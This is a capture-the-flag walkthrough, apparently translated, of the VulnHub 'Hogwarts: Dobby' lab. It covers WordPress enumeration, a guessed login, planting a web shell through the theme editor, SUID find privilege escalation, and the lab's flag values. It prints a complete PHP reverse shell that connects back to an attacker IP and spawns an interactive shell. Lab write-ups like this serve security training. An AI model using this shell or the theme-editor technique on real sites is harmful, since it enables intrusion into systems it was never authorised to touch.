Target drone address: Hogwarts: Dobby ~ VulnHub
Harry Potter was also my favorite movie in junior high school~ Dobby was Malfoy's slave elf who appeared in the second Chamber of Secrets. He was later saved by Harry Potter's socks and became a happy and free little boy. The elf, in the end, it also rescued Harry Potter and his group in the Deathly Hallows, but unfortunately it was stabbed by Bellatrix Lestrange 's dagger during the final teleportation and died!
Penetration process:
Start penetrating the target machine, determine the IP address, and scan the ports. There is only one port 80.
There is only one port 80. After accessing it, I found that it is an apache service and the header is different.
Check the source code and find the access path at the bottom
/alohomora
Opening spell
After the visit, he reminded Draco Malfoy that the password is his house. Write down this reminder first.
Explode the target drone directory
Found the log and php probes, access the log, there is a pass and path
I found something in the access path. This is brainfuck encryption. I also saw the wordpress framework in the footer.
Please solve it. The code is garbled. Ignore it for now.
Since it is wordpress, then use wpscan and enumerate to see what is there.
As before, draco user was found
The default path of wp: wp-login.php and wp-content
After the visit, go to login decryption and use draco. I thought it was the previous pass. After entering it, I was wrong. The prompt here is still in Spanish. 
Thinking back to the time before, he said that the password was Malfoy's house. Malfoy is from Slytherin House. Is that because its English name is the password?
draco:slytherin
After trying it, I successfully entered. Oh my god, what the hell? It’s all in Spanish. I can’t understand it!
Let’s change the language first. It’s only in English. Let’s just read it. It’s better than Spanish.
After the modification, look where there is getshell. It has a theme and can be edited. I can't help but think of the editor vulnerability. I use its own editor to write a sentence, and then access the modified file, using Ant Sword is used to connect, the specific idea is this!
Let’s first test the water briefly and write a php probe to enter it.
Then access the file of this theme and find success!
Then write a sentence without being polite and connect
Then I accidentally found a flag
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
So how do you create a local rebound shell? In fact, you can do subsequent operations directly in Ant Sword, but you are still used to operating in the local environment. Let’s rewrite the text of the rebound shell and write the Kali IP and port into the following file. , save it, use Ant Sword to upload it, access it on the web, turn on monitoring locally before accessing, and that's it! This is the idea!
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.136'; // You have changed this
$port = 7899; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
bingo, the rebound has come back, let me add a few words to add to the fun.
I discovered how to escalate privileges with find. It is easy and pleasant. I have used find many times before.
The infinite universe of heaven and earth borrows the law! break! Successful privilege escalation~rooted
Check proof.txt, hey, there is no cat yet, so let’s do more and get the final flag.
root{63a9f0ea7bb98050796b649e85481845!!}
Summarize:
The main vulnerability of this drone is the WordPress editor vulnerability. Through this vulnerability, you can obtain low permissions and escalate privileges to root through suid. It is still very interesting~ It’s just a matter of emotion~~~~
Please continue to pay attention. The Deathly Hallows series of the Harry Potter series will be released in the future. There are a total of eight Hallows and a total of 3 target drones, so stay tuned~